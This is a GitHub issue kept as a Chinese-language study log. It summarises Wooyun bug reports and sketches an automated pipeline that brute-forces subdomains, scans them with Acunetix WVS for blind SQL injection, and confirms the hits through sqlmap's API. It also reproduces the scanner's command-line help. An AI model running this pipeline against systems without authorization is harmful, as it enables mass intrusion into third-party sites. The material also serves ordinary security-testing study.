New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Python学习记录(十四):Awvs自动化扫描&wvs_console.exe #15

Open
PyxYuYu opened this Issue Mar 15, 2016 · 0 comments

Comments

Projects
None yet
1 participant
@PyxYuYu
Owner

PyxYuYu commented Mar 15, 2016

The best preparation for tomorrow is doing your best today.

0x01 Wooyun

  • 敏感信息泄漏
    • git 敏感信息泄漏
  • SQL 注入
    • APP 上面存在 SQL 注入
  • 账户体系控制不严
    • 所有商户的后台绕过帐号密码登录,按着ID更改就行(原因在于一个 token
  • 弱口令
0x02 Awvs自动化扫描

  • 猪猪侠之前展示过大数据时代的自动化漏洞扫描平台
    • 规则生成+解析器,自动挖掘信息合并信息再递归挖掘
    • 可递归的正则解析
  • 分布式漏洞扫描系统设计与实现
  • Awvs 自动化扫描是在知乎上看到的,之前使用 AppscanAwvs 在漏洞误报和全面性方面比 Appscan 有优势,利用 Python 结合 Awvs 自带的 wvs_console.exe 可以实现自动化扫描
    • 利用 subDomainsBrute 寻找子域名,导出保存 url
    • Awvs 有计划扫描的功能,一次最多200 url ,设置好扫描的漏洞类型,一般选择 Blind SQL Injection ,然后将扫描结果导入到数据库中
    • 调用 sqlmap api ,对数据库中的扫描结果进行自动化的确认测试
  • Awvs 命令行帮助信息
Acunetix WVS Console Application (c) Acunetix Ltd.

>> USAGE: wvs_console /Scan [URL]  OR  /Crawl [URL]  OR  /ScanFromCrawl [FILE]
                      OR  /ScanWSDL [WSDL URL]

>> PARAMETERS                                                                        //参数
       /Scan [URL]               : Scan specified URL                                //扫描指定的URL
       /Crawl [URL]              : Crawl specified URL                               //爬行指定的URL
       /ScanFromCrawl [FILE]     : Scan from crawling results                        //扫描爬行的结果
       /ScanWSDL [WSDL URL]      : Scan web services from WSDL URL                   //扫描来自WSDL的参数URL

       /Profile [PROFILE_NAME]   : Use specified scanning profile during scanning    //使用指定的扫描配置进行扫描
       /Settings [FILE]          : Use specified settings template during scanning   //使用指定的设置模板进行扫描
       /LoginSeq [FILE]          : Use specified login sequence                      //使用指定的登录序列
       /Import [FILE(s)]         : Import files during crawl                         //导入检索的地址进行爬行
       /Run [command line]       : Run this command during crawl                     //爬行时运行这个命令
       /Selenium [FILE]          : Execute selenium script during crawl              //执行selenium脚本进行爬行

       /Save                     : Save scan results                                 //保存结果
       /SaveFolder [DIR]         : Specify the folder were all the saved data will be stored //保存记录的目录
       /GenerateZIP              : Compress all the saved data into a zip file       //对所有的数据进行zip压缩
       /ExportXML                : Exports results as XML                            //将结果以XML方式导出
       /ExportAVDL               : Exports results as AVDL                           //将结果以AVDL方式导出
       /SavetoDatabase           : Save alerts to the database                       //把警告数据保存进数据库
       /SaveLogs                 : Save scan logs                                    //保存扫描日志
       /SaveCrawlerData          : Save crawler data (.CWL file)                     //保存爬行数据
       /GenerateReport           : Generate a report after the scan was completed    //扫描完成后生成报告
       /ReportFormat [FORMAT]    : Generated report format (REP, PDF, RTF, HTML)     //生成报告的格式
       /ReportTemplate [TEMPLATE]: Specify the report template                       //特定的报告模板
       /Timestamps               : Print current timestamp with each line.           //打印每行的时间戳
       /SendEmail                : Send email notification when scan is completed, using scheduler settings. //扫描结束后发送电子邮件
       /EmailAddress [EMAIL]     : Send email notification to this email address, override scheduler settings. //邮件地址,会把之前设置的给覆盖掉

       /Verbose                  : Enable verbose mode                               //开启细节模式。也就是发送的具体参数
       /Password                 : Application password (if required)                //如果有,需要写入密码
       /?                        : Show this help screen                             //帮助信息

>> OPTIONS [ ? = TRUE or FALSE ]                                                   //选项  =true 或者是=false
       --GetFirstOnly=?          : Get only the first URL                            //仅仅获取第一个url
       --RestrictToBaseFolder=?  : Do not fetch anything above start folder          //不扫描当前目录以上的其他目录(扫描二级目录有效)
       --FetchSubdirs=?          : Fetch files bellow base folder                    //获取子目录
       --ForceFetchDirindex=?    : Fetch directory indexes even if not linked        //扫描目录,即使该目录不再链接里面(就是目录匹配)
       --RobotsTxt=?             : Retrieve and process robots.txt                   //从robots.txt里面获取目录进行爬行
       --CaseInsensitivePaths=?  : Use case insensitive paths                        //不区分路径的大小写
       --UseWebKit=?             : Use WebKit based browser for discovery            //使用基于WebKit的浏览器
       --ScanningMode=*          : Scanning mode (* = Quick, Heuristic, Extensive)   //扫描模式(快速、启发式、广泛的)
       --ManipHTTPHeaders=?      : Manipulate HTTP headers                           //http头可以修改(可以修改http头进行提交)
       --UseAcuSensor=?          : Use AcuSensor technology                          //使用AcuSensor技术
       --EnablePortScanning=?    : Enable port scanning                              //启用端口扫描
       --UseSensorDataFromCrawl=*: Use sensor data from crawl(* = Yes, No, Revalidate) //抓取fuzz提交的数据( = 是,否,重新验证)
       --HtmlAuthUser=?          : Username for HTML based authentication            //基于HTTP认证的用户名
       --HtmlAuthPass=?          : Password for HTML based authentication            //基于HTTP认证的密码
       --ToolTimeout=?           : Timeout for testing tool in seconds               //设置提交的超时时间

>> EXAMPLES
wvs_console /Scan http://testphp.vulnweb.com  /SaveFolder c:\temp\scanResults\ /Save
wvs_console /ScanWSDL http://test/WS.asmx?WSDL /Profile ws_default /Save
wvs_console /Scan http://testphp.vulnweb.com /Profile default /Save --UseWebKit=false --ScanningMode=Heuristic

0x03 一天总结

  • 了解 Awvs 命令行的用法
  • 自动化扫描实现的基础
    • 扫描出 url
    • 导入 urlAwvs
    • 分析和利用扫描结果
  • 知道创宇的 Python 题目准备在这个自动化扫描完成之后去实现,估计还需要几天的时间

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment